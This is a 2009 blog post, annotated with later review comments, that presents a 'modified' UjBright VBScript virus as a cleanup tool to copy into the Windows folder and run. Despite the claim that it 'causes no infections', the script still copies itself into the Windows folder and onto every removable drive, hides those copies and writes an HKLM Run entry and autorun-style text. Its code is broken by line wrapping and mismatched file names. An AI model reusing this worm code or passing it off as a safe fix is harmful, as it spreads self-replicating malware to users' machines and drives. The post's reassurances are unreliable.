Sunday, November 8, 2009

UjBright Virus

The file UjBright_Antivirus.vbs infects the system and changes the settings under Explorer > Tools > Folder Options so that hidden files are NOT shown. It also disables registry editing, so that we cannot stop the virus from being active.

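I changed the file UjBright_Antivirus.vbs:
I changed the registry entries to re-enable whatever this file was disabling, and I added code for it to end the viral script.
Copy this file to the /systemroot/windows/ folder. It will run once and then stop. It causes no infections; it also clears the changes made by the virus. (The listing still contains the routines that copy the script into the Windows folder and onto removable drives and that write a Run entry, only with .txt file names, so read it through before running it.)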
===================

' Start-up section of the modified UjBright script: reads its own source, drops a
' copy of itself into the Windows folder and registers that copy under the HKLM Run key.
' NOTE(review): several statements below are split across lines without the VBScript
' line-continuation character, apparently by the page wrapping; treat this as a
' reading copy of the script rather than a runnable file.
' Every runtime error is suppressed from here on, so a failed file or registry
' operation leaves no visible trace.
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

' GetSpecialFolder(0) is the Windows folder; tf is the full path of the running script.
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

' Mid(x, 4) is the path after the drive prefix, i.e. the file name when the script
' sits in a drive root. x was lower-cased above while the literal keeps its capitals,
' so this comparison cannot match and the Explorer window is never opened.
If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

' Read the whole running script into scrText; this text is what gets written out
' as a copy below and onto removable drives later.
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

' Remember whether a copy already existed in the Windows folder before overwriting it.
ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")

' Self-copy into the Windows folder (existing file is overwritten).
Set myFile = fso.CreateTextFile(win &

"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close

' 39 = ReadOnly (1) + Hidden (2) + System (4) + Archive (32): the copy is hidden
' from a default Explorer view. For cleanup, look for this file with hidden and
' protected system files displayed.
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39

' Persistence: writes a machine-wide Run value named autoMe. The data is a quoted
' path to the .txt copy (with a leading space), not a wscript.exe command line.
' NOTE(review): what the shell does with that entry at logon depends on the .txt
' file association - confirm on a test system. The autoMe value is a useful
' indicator when checking a machine for this script or the original.
wscr.RegWrite

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""

' Only when no copy existed before: start the copy with wscript.exe.
' NOTE(review): Windows Script Host picks the script engine from the file extension,
' and no engine is normally registered for .txt, so this launch is expected to fail
' silently under On Error Resume Next - verify.
If ax = false Then wscr.Run "wscript.exe """ & win &

"\UjBright_Antivirus_vbs.txt"""

' Main section: writes files to every removable drive, resets a set of Explorer and
' policy registry values, then exits. It relies on fso, wscr, win, tf and scrText
' set earlier in the script, and on the earlier On Error Resume Next, which keeps
' every failure silent.
' The loop body ends with an unconditional WScript.Quit, so despite While (true)
' it executes at most once.
While (true)

Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

' DriveType 1 is a removable drive; the floppy drive A: is skipped.
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"

Then

' The test looks for Autorun.inf, but the file that is unprotected (32 = Archive
' only) and deleted is Autorun_inf.txt. An existing Autorun.inf on the drive,
' possibly one left by the original virus, is therefore left in place and has to
' be inspected and removed separately.
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")

Then
Set fAttr = fso.Getfile(myFlashDrive.Path &

"\Autorun_inf.txt")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",

true
End If

' Writes autorun-style content into Autorun_inf.txt. Windows only processes a file
' named autorun.inf, so under this name the content is inert text.
Set auFile = fso.CreateTextFile(myFlashDrive.Path &

"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &

"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &

"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &

vbCrLf & "shell\Open\Default=1"
auFile.close

' Drops a visible README_MIT_.txt note on the drive.
Set auFile = fso.CreateTextFile(myFlashDrive.Path &

"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""

& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus

infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &

vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" &

vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -

UJBRIGHT"
auFile.close

' 39 = ReadOnly + Hidden + System + Archive: the file is hidden on the drive.
Set fAttr = fso.Getfile(myFlashDrive.Path &

"\Autorun_inf.txt")
fAttr.Attributes=39

' The script text is still copied to the removable drive and hidden the same way.
' A drive that has been in a machine running this script carries these hidden
' files and should be checked with hidden and system files displayed.
Set myFile = fso.CreateTextFile(myFlashDrive.Path &

"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path &

"\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39

End If

Next

' Registry writes. The first rewrites the HKLM Run value autoMe to point at
' UjBright_Antivirus.txt, a name that differs from the UjBright_Antivirus_vbs.txt
' copy this script creates, so the entry refers to a file the script does not write.
' The remaining values are under HKEY_CURRENT_USER and only affect the current user:
'   Hidden = 0               NOTE(review): the documented values are 1 (show hidden
'                            files) and 2 (do not show); confirm 0 has the intended effect.
'   HideFileExt = 0          file extensions are shown.
'   ShowSuperHidden = 0      protected operating system files stay hidden.
'   NoFolderOptions = 0      the Folder Options menu item is available again.
'   NoDriveTypeAutoRun = 128 bitmask of drive types with AutoRun turned off; 0x80
'                            covers only unknown types, so AutoRun on removable
'                            drives (bit 0x04) is not turned off by this value.
'                            255 (0xFF) turns it off for every drive type.
'   DisableRegistryTools = 0 registry editing is allowed again.
'   DisableTaskMgr = 0       Task Manager is allowed again.
With wscr
.RegWrite

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

autoMe", " """ & win & "\UjBright_Antivirus.txt"""
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With

' When running from anywhere other than win\UjBright_Antivirus.txt, quit at once
' if the drive holding the script is no longer ready (for example, it was removed).
If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

' Wait 10 seconds, then exit; Wend below is never reached.
WScript.Sleep 10000
WScript.Quit

Wend
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
